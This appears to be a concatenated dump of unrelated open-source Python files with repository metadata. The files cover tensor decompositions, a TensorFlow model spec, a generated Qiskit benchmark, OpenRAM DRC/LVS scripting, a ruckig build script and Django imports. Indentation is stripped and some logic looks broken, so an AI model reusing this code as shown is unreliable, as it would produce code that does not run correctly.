Vn.append(V);
Sn.append(S);
Z=T.copy()
for n in range(len(Un)):
Z = nmodmult(Z, Un[n].T, n+1)
for i in range(len(Un)):
new_T = nmodmult(Z, Un[n], n+1)
if not saveSpace:
return [new_T, Z, Un, Sn, Vn]
return [Z, Un]
def unflatten(T, sizes, n):
"""D = UNFLATTEN(T, SIZES, N) remakes a tensor out of a matrix.
Such that the mode N flattening of the tensor will return the
matrix T.
SYNOPSIS:
T - a matrix of size mxn
SIZES - size of the output matrix prod(sizes) must equal mxn
N - The mode in which to unflatten t into.
AUTHOR Larsson Omberg lom@larssono.com
DATE 21-January-2005, 5-june-2009"""
if np.prod(sizes) != np.prod(T.shape) or T.ndim !=2:
raise ValueError('matrix and output tensor must have same number of elements')
if n>len(sizes) | n<=0 :
raise ValueError('n has to be between 1 and the number of dimensions of T')
order=[n-1,]
order.extend(range(n, len(sizes)))
order.extend(range(n-1))
#ndx = [order ones(1,ndims(b)-length(order))];
#ndx(ndx) = 1:max(length(order),ndims(b)); % Inverse permutation order
ndx = np.arange(len(order))
ndx[order] = np.arange(len(order)) # Inverse permutation order
d=np.reshape(T,sizes[order], order='FORTRAN');
return np.transpose(d, ndx); #np.transpose(...)
def nmodmult(A, B, n):
"""NMODMULT peforms the n-mode multiplication of a tensor and matrix
T = NMODMULT(A, B, N)
A is a tensor of order < N
B is a matrix to be multiplied
N is the order of the multiplication
return: tensor product of A x_N B"""
Asize = np.asarray(A.shape);
Asize[n-1] = B.shape[0];
An=flatten(A,n)
T = unflatten(np.dot(B,An), Asize, n);
return T
def gsvd(A,B):
"""Computes the generalized singular value decomposition
U1,U2,V,S1,S2 = GSVD(A,B)
such that A=U1 * S1 * V'
B=U2 * S2 * V'
S1'*S1 + S2'*S2 = I
using the method described by Paige and Saunders in 1981
Arguments:
- `A`: a matrix of dimensions m x n
- `B`: a matrix of dimensions p x n
Returns: unitary matrices U1 and U2, a square matrix V, and
nonnegative diagonal matrices S1 and S2.
"""
A = np.asarray(A)
B = np.asarray(B)
m,n = A.shape
p,n1 = B.shape
if n1!=n:
raise LinAlgError('The number of columns in the two matrices A and B don\'t match')
#First Step of algorithm
P, R0, Q = svd(np.concatenate([A,B]))
k = sum(R0>1e-12)
R0=np.diag(R0)
#Second Step part a
P11 = P[:m,:k]
U1, SA, W1=svd(P11)
S1=np.zeros_like(P11)
np.fill_diagonal(S1, SA)
if S1.shape[0] > len(SA): #Workaround for bug #1953 in fill_diagonal
S1[len(SA):, :] = 0
#Second Step part b
P21 = P[m:m+p,:k]
VB, SB, W=svd(P21)
kr = min(p, k)
S2 = np.zeros((p,k))
S2[p-kr:, k-kr:] = np.diag(SB[kr::-1])
U2=reduce(np.dot, (P21, W1.T, pinv(S2)))
Z=np.zeros((k,n-k));
V=np.dot(np.hstack((np.dot(W1, R0[:k,:k]), Z)), Q).T
return U1, U2, S1, S2, V
def test():
T=np.reshape(np.arange(1,121).T, (3,4,5,2), order='FORTRAN')
Z,Un,Sn,Vn = hosvd(T)
x=nmodmult(Z, Un[0],1)
x=nmodmult(x, Un[1],2)
x=nmodmult(x, Un[2],3)
x=nmodmult(x, Un[3],4)
assert np.all(x-T<1e-12)
A=[[1, 6, 11],
[2, 7, 12],
[3, 8, 13],
[4, 9, 14],
[5, 10, 15]]
B=[[8, 1, 6],
[3, 5, 7],
[4, 9, 2]]
U1, U2, S1, S2, V = gsvd(A,B)
assert (np.all(reduce(np.dot, (U1,S1,V.T))-A < 1e-8) and np.all(reduce(np.dot, (U2,S2,V.T))-B < 1e-8))
A=[[1, 4, 7, 10, 13],
[2, 5, 8, 11, 14],
[3, 6, 9, 12, 15]]
B=[[17, 24, 1, 8, 15],
[23, 5, 7, 14, 16],
[ 4, 6, 13, 20, 22],
[10, 12, 19, 21, 3]]
U1, U2, S1, S2, V = gsvd(A,B)
assert (np.all(reduce(np.dot, (U1,S1,V.T))-A < 1e-8) and np.all(reduce(np.dot, (U2,S2,V.T))-B < 1e-8))
if __name__ == '__main__':
test()
| 29.307692
| 106
| 0.549256
|
f1644033ce063188c7fc737957fc2a09d10c467a
| 1,256
|
py
|
Python
|
tensorflow_examples/lite/model_customization/core/task/model_spec.py
|
rrtaylor/examples
|
2f1e9cb83f49f4678bbfcf9abbc677551ed557c4
|
[
"Apache-2.0"
] | 2
|
2019-11-26T09:52:53.000Z
|
2020-11-05T02:55:35.000Z
|
tensorflow_examples/lite/model_customization/core/task/model_spec.py
|
Mahesh-Bauri/examples
|
2f1e9cb83f49f4678bbfcf9abbc677551ed557c4
|
[
"Apache-2.0"
] | 7
|
2021-03-19T15:39:52.000Z
|
2022-03-12T00:52:01.000Z
|
tensorflow_examples/lite/model_customization/core/task/model_spec.py
|
Mahesh-Bauri/examples
|
2f1e9cb83f49f4678bbfcf9abbc677551ed557c4
|
[
"Apache-2.0"
] | 3
|
2019-12-11T18:56:32.000Z
|
2019-12-12T15:39:07.000Z
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Model specification."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
class ImageModelSpec(object):
"""A specification of image model."""
input_image_shape = [224, 224]
mean_rgb = [0, 0, 0]
stddev_rgb = [255, 255, 255]
def __init__(self, name, uri):
self.name = name
self.uri = uri
efficientnet_b0_spec = ImageModelSpec(
name='efficientnet_b0',
uri='https://tfhub.dev/google/efficientnet/b0/feature-vector/1')
mobilenet_v2_spec = ImageModelSpec(
name='mobilenet_v2',
uri='https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4')
| 32.205128
| 77
| 0.746815
|
2788b89eba53972310e1a74edb5d62f32b604c72
| 2,507
|
py
|
Python
|
data/p4VQE/R4/benchmark/startQiskit_QC201.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p4VQE/R4/benchmark/startQiskit_QC201.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p4VQE/R4/benchmark/startQiskit_QC201.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=3
# total number=10
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
import networkx as nx
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def make_circuit(n:int) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
prog = QuantumCircuit(input_qubit)
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.y(input_qubit[3]) # number=5
for edge in E:
k = edge[0]
l = edge[1]
prog.cp(-2 * gamma, input_qubit[k-1], input_qubit[l-1])
prog.p(gamma, k)
prog.p(gamma, l)
prog.rx(2 * beta, range(len(V)))
prog.x(input_qubit[3]) # number=7
prog.cx(input_qubit[1],input_qubit[0]) # number=8
prog.cx(input_qubit[1],input_qubit[0]) # number=9
# circuit end
return prog
if __name__ == '__main__':
n = 4
V = np.arange(0, n, 1)
E = [(0, 1, 1.0), (0, 2, 1.0), (1, 2, 1.0), (3, 2, 1.0), (3, 1, 1.0)]
G = nx.Graph()
G.add_nodes_from(V)
G.add_weighted_edges_from(E)
step_size = 0.1
a_gamma = np.arange(0, np.pi, step_size)
a_beta = np.arange(0, np.pi, step_size)
a_gamma, a_beta = np.meshgrid(a_gamma, a_beta)
F1 = 3 - (np.sin(2 * a_beta) ** 2 * np.sin(2 * a_gamma) ** 2 - 0.5 * np.sin(4 * a_beta) * np.sin(4 * a_gamma)) * (
1 + np.cos(4 * a_gamma) ** 2)
result = np.where(F1 == np.amax(F1))
a = list(zip(result[0], result[1]))[0]
gamma = a[0] * step_size
beta = a[1] * step_size
prog = make_circuit(4)
sample_shot =5600
writefile = open("../data/startQiskit_QC201.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = provider.get_backend("ibmq_5_yorktown")
circuit1 = transpile(prog, FakeYorktown())
circuit1.measure_all()
prog = circuit1
info = execute(prog,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
| 27.25
| 118
| 0.634224
|
18ba53fcf2aabfb90186f575a24ec182cff55d92
| 19,856
|
py
|
Python
|
compiler/verify/magic.py
|
mudassiruddin/OpenRAM
|
0589a35f7315fc075eaca38c0abd477703e70bf7
|
[
"BSD-3-Clause"
] | null | null | null |
compiler/verify/magic.py
|
mudassiruddin/OpenRAM
|
0589a35f7315fc075eaca38c0abd477703e70bf7
|
[
"BSD-3-Clause"
] | null | null | null |
compiler/verify/magic.py
|
mudassiruddin/OpenRAM
|
0589a35f7315fc075eaca38c0abd477703e70bf7
|
[
"BSD-3-Clause"
] | null | null | null |
# See LICENSE for licensing information.
#
# Copyright (c) 2016-2021 Regents of the University of California and The Board
# of Regents for the Oklahoma Agricultural and Mechanical College
# (acting for and on behalf of Oklahoma State University)
# All rights reserved.
#
"""
This is a DRC/LVS/PEX interface file for magic + netgen.
We include the tech file for SCN4M_SUBM in the tech directory,
that is included in OpenRAM during DRC.
You can use this interactively by appending the magic system path in
your .magicrc file
path sys /Users/mrg/openram/technology/scn3me_subm/tech
We require the version 30 Magic rules which allow via stacking.
We obtained this file from Qflow ( http://opencircuitdesign.com/qflow/index.html )
and include its appropriate license.
"""
import os
import re
import shutil
import debug
from globals import OPTS
from run_script import *
# Keep track of statistics
num_drc_runs = 0
num_lvs_runs = 0
num_pex_runs = 0
# def filter_gds(cell_name, input_gds, output_gds):
# """ Run the gds through magic for any layer processing """
# global OPTS
# # Copy .magicrc file into temp dir
# magic_file = OPTS.openram_tech + "tech/.magicrc"
# if os.path.exists(magic_file):
# shutil.copy(magic_file, OPTS.openram_temp)
# else:
# debug.warning("Could not locate .magicrc file: {}".format(magic_file))
# run_file = OPTS.openram_temp + "run_filter.sh"
# f = open(run_file, "w")
# f.write("#!/bin/sh\n")
# f.write("{} -dnull -noconsole << EOF\n".format(OPTS.magic_exe[1]))
# f.write("gds polygon subcell true\n")
# f.write("gds warning default\n")
# f.write("gds read {}\n".format(input_gds))
# f.write("load {}\n".format(cell_name))
# f.write("cellname delete \\(UNNAMED\\)\n")
# #f.write("writeall force\n")
# f.write("select top cell\n")
# f.write("gds write {}\n".format(output_gds))
# f.write("quit -noprompt\n")
# f.write("EOF\n")
# f.close()
# os.system("chmod u+x {}".format(run_file))
# (outfile, errfile, resultsfile) = run_script(cell_name, "filter")
def write_drc_script(cell_name, gds_name, extract, final_verification, output_path, sp_name=None):
""" Write a magic script to perform DRC and optionally extraction. """
global OPTS
# Copy .magicrc file into the output directory
magic_file = os.environ.get('OPENRAM_MAGICRC', None)
if not magic_file:
magic_file = OPTS.openram_tech + "tech/.magicrc"
if os.path.exists(magic_file):
shutil.copy(magic_file, output_path + "/.magicrc")
else:
debug.warning("Could not locate .magicrc file: {}".format(magic_file))
run_file = output_path + "run_ext.sh"
f = open(run_file, "w")
f.write("#!/bin/sh\n")
f.write('export OPENRAM_TECH="{}"\n'.format(os.environ['OPENRAM_TECH']))
f.write('echo "$(date): Starting GDS to MAG using Magic {}"\n'.format(OPTS.drc_exe[1]))
f.write('\n')
f.write("{} -dnull -noconsole << EOF\n".format(OPTS.drc_exe[1]))
# Do not run DRC for extraction/conversion
f.write("drc off\n")
f.write("set VDD vdd\n")
f.write("set GND gnd\n")
f.write("set SUB gnd\n")
#f.write("gds polygon subcell true\n")
f.write("gds warning default\n")
# These two options are temporarily disabled until Tim fixes a bug in magic related
# to flattening channel routes and vias (hierarchy with no devices in it). Otherwise,
# they appear to be disconnected.
f.write("gds flatten true\n")
f.write("gds ordering true\n")
f.write("gds readonly true\n")
f.write("gds read {}\n".format(gds_name))
f.write('puts "Finished reading gds {}"\n'.format(gds_name))
f.write("load {}\n".format(cell_name))
f.write('puts "Finished loading cell {}"\n'.format(cell_name))
f.write("cellname delete \\(UNNAMED\\)\n")
f.write("writeall force\n")
# Extract
if not sp_name:
f.write("port makeall\n")
else:
f.write("readspice {}\n".format(sp_name))
if not extract:
pre = "#"
else:
pre = ""
if final_verification and OPTS.route_supplies:
f.write(pre + "extract unique all\n")
# Hack to work around unit scales in SkyWater
if OPTS.tech_name=="sky130":
f.write(pre + "extract style ngspice(si)\n")
f.write(pre + "extract\n")
f.write('puts "Finished extract"\n')
# f.write(pre + "ext2spice hierarchy on\n")
# f.write(pre + "ext2spice scale off\n")
# lvs exists in 8.2.79, but be backword compatible for now
# f.write(pre + "ext2spice lvs\n")
f.write(pre + "ext2spice hierarchy on\n")
f.write(pre + "ext2spice format ngspice\n")
f.write(pre + "ext2spice cthresh infinite\n")
f.write(pre + "ext2spice rthresh infinite\n")
f.write(pre + "ext2spice renumber off\n")
f.write(pre + "ext2spice scale off\n")
f.write(pre + "ext2spice blackbox on\n")
f.write(pre + "ext2spice subcircuit top on\n")
f.write(pre + "ext2spice global off\n")
# Can choose hspice, ngspice, or spice3,
# but they all seem compatible enough.
f.write(pre + "ext2spice format ngspice\n")
f.write(pre + "ext2spice {}\n".format(cell_name))
f.write('puts "Finished ext2spice"\n')
f.write("quit -noprompt\n")
f.write("EOF\n")
f.write("magic_retcode=$?\n")
f.write('echo "$(date): Finished ($magic_retcode) GDS to MAG using Magic {}"\n'.format(OPTS.drc_exe[1]))
f.write("exit $magic_retcode\n")
f.close()
os.system("chmod u+x {}".format(run_file))
run_file = output_path + "run_drc.sh"
f = open(run_file, "w")
f.write("#!/bin/sh\n")
f.write('export OPENRAM_TECH="{}"\n'.format(os.environ['OPENRAM_TECH']))
# Copy the bitcell mag files if they exist
try:
from tech import blackbox_cells
except ImportError:
blackbox_cells = []
for blackbox_cell_name in blackbox_cells:
mag_file = OPTS.openram_tech + "maglef_lib/" + blackbox_cell_name + ".mag"
debug.check(os.path.isfile(mag_file), "Could not find blackbox cell {}".format(mag_file))
f.write('cp {0} .\n'.format(mag_file))
f.write('echo "$(date): Starting DRC using Magic {}"\n'.format(OPTS.drc_exe[1]))
f.write('\n')
f.write("{} -dnull -noconsole << EOF\n".format(OPTS.drc_exe[1]))
f.write("load {} -dereference\n".format(cell_name))
f.write('puts "Finished loading cell {}"\n'.format(cell_name))
f.write("cellname delete \\(UNNAMED\\)\n")
f.write("select top cell\n")
f.write("expand\n")
f.write('puts "Finished expanding"\n')
f.write("drc euclidean on\n")
f.write("drc check\n")
f.write('puts "Finished drc check"\n')
f.write("drc catchup\n")
f.write('puts "Finished drc catchup"\n')
# This is needed instead of drc count total because it displays
# some errors that are not "DRC" errors.
# f.write("puts -nonewline \"Total DRC errors found: \"\n")
# f.write("puts stdout [drc listall count total]\n")
f.write("drc count total\n")
f.write("quit -noprompt\n")
f.write("EOF\n")
f.write("magic_retcode=$?\n")
f.write('echo "$(date): Finished ($magic_retcode) DRC using Magic {}"\n'.format(OPTS.drc_exe[1]))
f.write("exit $magic_retcode\n")
f.close()
os.system("chmod u+x {}".format(run_file))
def run_drc(cell_name, gds_name, sp_name=None, extract=True, final_verification=False):
"""Run DRC check on a cell which is implemented in gds_name."""
global num_drc_runs
num_drc_runs += 1
write_drc_script(cell_name, gds_name, extract, final_verification, OPTS.openram_temp, sp_name=sp_name)
(outfile, errfile, resultsfile) = run_script(cell_name, "ext")
(outfile, errfile, resultsfile) = run_script(cell_name, "drc")
# Check the result for these lines in the summary:
# Total DRC errors found: 0
# The count is shown in this format:
# Cell replica_cell_6t has 3 error tiles.
# Cell tri_gate_array has 8 error tiles.
# etc.
try:
f = open(outfile, "r")
except FileNotFoundError:
debug.error("Unable to load DRC results file from {}. Is magic set up?".format(outfile), 1)
results = f.readlines()
f.close()
errors=1
# those lines should be the last 3
for line in results:
if "Total DRC errors found:" in line:
errors = int(re.split(": ", line)[1])
break
else:
debug.error("Unable to find the total error line in Magic output.", 1)
# always display this summary
result_str = "DRC Errors {0}\t{1}".format(cell_name, errors)
if errors > 0:
for line in results:
if "error tiles" in line:
debug.info(1, line.rstrip("\n"))
debug.warning(result_str)
else:
debug.info(1, result_str)
return errors
def write_lvs_script(cell_name, gds_name, sp_name, final_verification=False, output_path=None):
""" Write a netgen script to perform LVS. """
global OPTS
if not output_path:
output_path = OPTS.openram_temp
# Copy setup.tcl file into the output directory
setup_file = os.environ.get('OPENRAM_NETGENRC', None)
if not setup_file:
setup_file = OPTS.openram_tech + "tech/setup.tcl"
if os.path.exists(setup_file):
# Copy setup.tcl file into temp dir
shutil.copy(setup_file, output_path)
else:
setup_file = 'nosetup'
run_file = output_path + "/run_lvs.sh"
f = open(run_file, "w")
f.write("#!/bin/sh\n")
f.write('export OPENRAM_TECH="{}"\n'.format(os.environ['OPENRAM_TECH']))
f.write('echo "$(date): Starting LVS using Netgen {}"\n'.format(OPTS.lvs_exe[1]))
f.write("{} -noconsole << EOF\n".format(OPTS.lvs_exe[1]))
# f.write("readnet spice {0}.spice\n".format(cell_name))
# f.write("readnet spice {0}\n".format(sp_name))
f.write("lvs {{{0}.spice {0}}} {{{1} {0}}} {2} {0}.lvs.report -full -json\n".format(cell_name, sp_name, setup_file))
f.write("quit\n")
f.write("EOF\n")
f.write("magic_retcode=$?\n")
f.write('echo "$(date): Finished ($magic_retcode) LVS using Netgen {}"\n'.format(OPTS.lvs_exe[1]))
f.write("exit $magic_retcode\n")
f.close()
os.system("chmod u+x {}".format(run_file))
def run_lvs(cell_name, gds_name, sp_name, final_verification=False, output_path=None):
"""Run LVS check on a given top-level name which is
implemented in gds_name and sp_name. Final verification will
ensure that there are no remaining virtual conections. """
global num_lvs_runs
num_lvs_runs += 1
if not output_path:
output_path = OPTS.openram_temp
write_lvs_script(cell_name, gds_name, sp_name, final_verification)
(outfile, errfile, resultsfile) = run_script(cell_name, "lvs")
total_errors = 0
# check the result for these lines in the summary:
try:
f = open(resultsfile, "r")
except FileNotFoundError:
debug.error("Unable to load LVS results from {}".format(resultsfile), 1)
results = f.readlines()
f.close()
# Look for the results after the final "Subcircuit summary:"
# which will be the top-level netlist.
final_results = []
for line in reversed(results):
if "Subcircuit summary:" in line:
break
else:
final_results.insert(0, line)
# There were property errors in any module.
test = re.compile("Property errors were found.")
propertyerrors = list(filter(test.search, results))
total_errors += len(propertyerrors)
# Require pins to match?
# Cell pin lists for pnand2_1.spice and pnand2_1 altered to match.
# test = re.compile(".*altered to match.")
# pinerrors = list(filter(test.search, results))
# if len(pinerrors)>0:
# debug.warning("Pins altered to match in {}.".format(cell_name))
#if len(propertyerrors)>0:
# debug.warning("Property errors found, but not checking them.")
# Netlists do not match.
test = re.compile("Netlists do not match.")
incorrect = list(filter(test.search, final_results))
total_errors += len(incorrect)
# Netlists match uniquely.
test = re.compile("match uniquely.")
correct = list(filter(test.search, final_results))
# Fail if they don't match. Something went wrong!
if len(correct) == 0:
total_errors += 1
if total_errors>0:
# Just print out the whole file, it is short.
for e in results:
debug.info(1,e.strip("\n"))
debug.error("{0}\tLVS mismatch (results in {1})".format(cell_name,resultsfile))
else:
debug.info(1, "{0}\tLVS matches".format(cell_name))
return total_errors
def run_pex(name, gds_name, sp_name, output=None, final_verification=False, output_path=None):
"""Run pex on a given top-level name which is
implemented in gds_name and sp_name. """
global num_pex_runs
num_pex_runs += 1
if not output_path:
output_path = OPTS.openram_temp
os.chdir(output_path)
if not output_path:
output_path = OPTS.openram_temp
if output == None:
output = name + ".pex.netlist"
# check if lvs report has been done
# if not run drc and lvs
if not os.path.isfile(name + ".lvs.report"):
run_drc(name, gds_name)
run_lvs(name, gds_name, sp_name)
# pex_fix did run the pex using a script while dev orignial method
# use batch mode.
# the dev old code using batch mode does not run and is split into functions
pex_runset = write_script_pex_rule(gds_name, name, sp_name, output)
errfile = "{0}{1}.pex.err".format(output_path, name)
outfile = "{0}{1}.pex.out".format(output_path, name)
script_cmd = "{0} 2> {1} 1> {2}".format(pex_runset,
errfile,
outfile)
cmd = script_cmd
debug.info(2, cmd)
os.system(cmd)
# rename technology models
pex_nelist = open(output, 'r')
s = pex_nelist.read()
pex_nelist.close()
s = s.replace('pfet', 'p')
s = s.replace('nfet', 'n')
f = open(output, 'w')
f.write(s)
f.close()
# also check the output file
f = open(outfile, "r")
results = f.readlines()
f.close()
out_errors = find_error(results)
debug.check(os.path.isfile(output), "Couldn't find PEX extracted output.")
correct_port(name, output, sp_name)
return out_errors
def write_batch_pex_rule(gds_name, name, sp_name, output):
"""
The dev branch old batch mode runset
2. magic can perform extraction with the following:
#!/bin/sh
rm -f $1.ext
rm -f $1.spice
magic -dnull -noconsole << EOF
tech load SCN3ME_SUBM.30
#scalegrid 1 2
gds rescale no
gds polygon subcell true
gds warning default
gds read $1
extract
ext2spice scale off
ext2spice
quit -noprompt
EOF
"""
pex_rules = drc["xrc_rules"]
pex_runset = {
'pexRulesFile': pex_rules,
'pexRunDir': OPTS.openram_temp,
'pexLayoutPaths': gds_name,
'pexLayoutPrimary': name,
#'pexSourcePath' : OPTS.openram_temp+"extracted.sp",
'pexSourcePath': sp_name,
'pexSourcePrimary': name,
'pexReportFile': name + ".lvs.report",
'pexPexNetlistFile': output,
'pexPexReportFile': name + ".pex.report",
'pexMaskDBFile': name + ".maskdb",
'cmnFDIDEFLayoutPath': name + ".def",
}
# write the runset file
file = OPTS.openram_temp + "pex_runset"
f = open(file, "w")
for k in sorted(pex_runset.keys()):
f.write("*{0}: {1}\n".format(k, pex_runset[k]))
f.close()
return file
def write_script_pex_rule(gds_name, cell_name, sp_name, output):
global OPTS
run_file = OPTS.openram_temp + "run_pex.sh"
f = open(run_file, "w")
f.write("#!/bin/sh\n")
f.write('export OPENRAM_TECH="{}"\n'.format(os.environ['OPENRAM_TECH']))
f.write('echo "$(date): Starting PEX using Magic {}"\n'.format(OPTS.drc_exe[1]))
f.write("{} -dnull -noconsole << EOF\n".format(OPTS.drc_exe[1]))
f.write("gds polygon subcell true\n")
f.write("gds warning default\n")
f.write("gds read {}\n".format(gds_name))
f.write("load {}\n".format(cell_name))
f.write("select top cell\n")
f.write("expand\n")
if not sp_name:
f.write("port makeall\n")
else:
f.write("readspice {}\n".format(sp_name))
f.write("extract\n")
f.write("ext2sim labels on\n")
f.write("ext2sim\n")
f.write("extresist simplify off\n")
f.write("extresist all\n")
f.write("ext2spice hierarchy off\n")
f.write("ext2spice format ngspice\n")
f.write("ext2spice renumber off\n")
f.write("ext2spice scale off\n")
f.write("ext2spice blackbox on\n")
f.write("ext2spice subcircuit top on\n")
f.write("ext2spice global off\n")
f.write("ext2spice extresist on\n")
f.write("ext2spice {}\n".format(cell_name))
f.write("quit -noprompt\n")
f.write("EOF\n")
f.write("magic_retcode=$?\n")
f.write("mv {0}.spice {1}\n".format(cell_name, output))
f.write('echo "$(date): Finished PEX using Magic {}"\n'.format(OPTS.drc_exe[1]))
f.write("exit $magic_retcode\n")
f.close()
os.system("chmod u+x {}".format(run_file))
return run_file
def find_error(results):
# Errors begin with "ERROR:"
test = re.compile("ERROR:")
stdouterrors = list(filter(test.search, results))
for e in stdouterrors:
debug.error(e.strip("\n"))
out_errors = len(stdouterrors)
return out_errors
def correct_port(name, output_file_name, ref_file_name):
pex_file = open(output_file_name, "r")
contents = pex_file.read()
# locate the start of circuit definition line
match = re.search(r'^\.subckt+[^M]*', contents, re.MULTILINE)
match_index_start = match.start()
match_index_end = match.end()
# store the unchanged part of pex file in memory
pex_file.seek(0)
part1 = pex_file.read(match_index_start)
pex_file.seek(match_index_end)
part2 = pex_file.read()
bitcell_list = "+ "
if OPTS.words_per_row:
for bank in range(OPTS.num_banks):
for bank in range(OPTS.num_banks):
row = int(OPTS.num_words / OPTS.words_per_row) - 1
col = int(OPTS.word_size * OPTS.words_per_row) - 1
bitcell_list += "bitcell_Q_b{0}_r{1}_c{2} ".format(bank, row, col)
bitcell_list += "bitcell_Q_bar_b{0}_r{1}_c{2} ".format(bank, row, col)
for col in range(OPTS.word_size * OPTS.words_per_row):
for port in range(OPTS.num_r_ports + OPTS.num_w_ports + OPTS.num_rw_ports):
bitcell_list += "bl{0}_{1} ".format(bank, col)
bitcell_list += "br{0}_{1} ".format(bank, col)
bitcell_list += "\n"
control_list = "+ "
if OPTS.words_per_row:
for bank in range(OPTS.num_banks):
control_list += "bank_{}/s_en0".format(bank)
control_list += '\n'
part2 = bitcell_list + control_list + part2
pex_file.close()
# obtain the correct definition line from the original spice file
sp_file = open(ref_file_name, "r")
contents = sp_file.read()
circuit_title = re.search(".SUBCKT " + str(name) + ".*", contents)
circuit_title = circuit_title.group()
sp_file.close()
# write the new pex file with info in the memory
output_file = open(output_file_name, "w")
output_file.write(part1)
output_file.write(circuit_title + '\n')
output_file.write(part2)
output_file.close()
def print_drc_stats():
debug.info(1, "DRC runs: {0}".format(num_drc_runs))
def print_lvs_stats():
debug.info(1, "LVS runs: {0}".format(num_lvs_runs))
def print_pex_stats():
debug.info(1, "PEX runs: {0}".format(num_pex_runs))
| 34.532174
| 120
| 0.639303
|
e84065fa0f7f4c372c96bad796c87e7519ec6604
| 3,291
|
py
|
Python
|
setup.py
|
ba-robo/ruckig
|
5dcdaa654a5d19ef9d7fd745e38294f5a19605d1
|
[
"MIT"
] | null | null | null |
setup.py
|
ba-robo/ruckig
|
5dcdaa654a5d19ef9d7fd745e38294f5a19605d1
|
[
"MIT"
] | null | null | null |
setup.py
|
ba-robo/ruckig
|
5dcdaa654a5d19ef9d7fd745e38294f5a19605d1
|
[
"MIT"
] | null | null | null |
import os
import re
import subprocess
import sys
from setuptools import setup, Extension, find_packages
from setuptools.command.build_ext import build_ext
from distutils.version import LooseVersion
with open('README.md', 'r') as readme_file:
long_description = readme_file.read()
class CMakeExtension(Extension):
def __init__(self, name, sourcedir=''):
Extension.__init__(self, name, sources=[])
self.sourcedir = os.path.abspath(sourcedir)
class CMakeBuild(build_ext):
def run(self):
try:
out = subprocess.check_output(['cmake', '--version'])
except OSError as err:
raise RuntimeError(
'CMake must be installed to build the following extensions: ' +
', '.join(e.name for e in self.extensions)
) from err
cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)', out.decode()).group(1))
if cmake_version < LooseVersion('3.10.0'):
raise RuntimeError('CMake >= 3.10.0 is required')
for ext in self.extensions:
self.build_extension(ext)
def build_extension(self, ext):
extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
# required for auto-detection of auxiliary "native" libs
if not extdir.endswith(os.path.sep):
extdir += os.path.sep
build_type = os.environ.get('BUILD_TYPE', 'Release')
build_args = ['--config', build_type]
cmake_args = [
'-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,
'-DCMAKE_ARCHIVE_OUTPUT_DIRECTORY=' + extdir,
'-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_RELEASE=' + extdir,
'-DCMAKE_ARCHIVE_OUTPUT_DIRECTORY_RELEASE=' + extdir,
'-DPYTHON_EXECUTABLE={}'.format(sys.executable),
'-DEXAMPLE_VERSION_INFO={}'.format(self.distribution.get_version()),
'-DCMAKE_BUILD_TYPE=' + build_type,
'-DBUILD_PYTHON_MODULE=ON',
'-DBUILD_EXAMPLES=OFF',
'-DBUILD_TESTS=OFF',
'-DBUILD_SHARED_LIBS=OFF',
'-DCMAKE_POSITION_INDEPENDENT_CODE=ON',
]
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, cwd=self.build_temp)
subprocess.check_call(['cmake', '--build', '.'] + build_args, cwd=self.build_temp)
setup(
name='ruckig',
version='0.5.0',
description='Instantaneous Motion Generation for Robots and Machines.',
long_description=long_description,
long_description_content_type='text/markdown',
author='Lars Berscheid',
author_email='info@ruckig.com',
url='https://www.ruckig.com',
packages=find_packages(),
license='MIT',
ext_modules=[CMakeExtension('python_ruckig')],
cmdclass=dict(build_ext=CMakeBuild),
keywords=['robotics', 'trajectory-generation', 'real-time', 'jerk-constrained', 'time-optimal'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'License :: OSI Approved :: MIT License',
'Programming Language :: C++',
],
python_requires='>=3.6',
zip_safe=False,
)
| 35.010638
| 100
| 0.639623
|
921b7e09b07ba1824e4e275c23ae044321319a4c
| 1,196
|
py
|
Python
|
workon/forms/info.py
|
dalou/django-workon
|
ef63c0a81c00ef560ed693e435cf3825f5170126
|
[
"BSD-3-Clause"
] | null | null | null |
workon/forms/info.py
|
dalou/django-workon
|
ef63c0a81c00ef560ed693e435cf3825f5170126
|
[
"BSD-3-Clause"
] | null | null | null |
workon/forms/info.py
|
dalou/django-workon
|
ef63c0a81c00ef560ed693e435cf3825f5170126
|
[
"BSD-3-Clause"
] | null | null | null |
# encoding: utf-8
import re
import os
import logging
import locale
import datetime, time
from django import forms
from django.conf import settings
from django.db.models import CharField
from django.core.exceptions import ValidationError
from django.utils.encoding import force_unicode
from django.forms.utils import flatatt
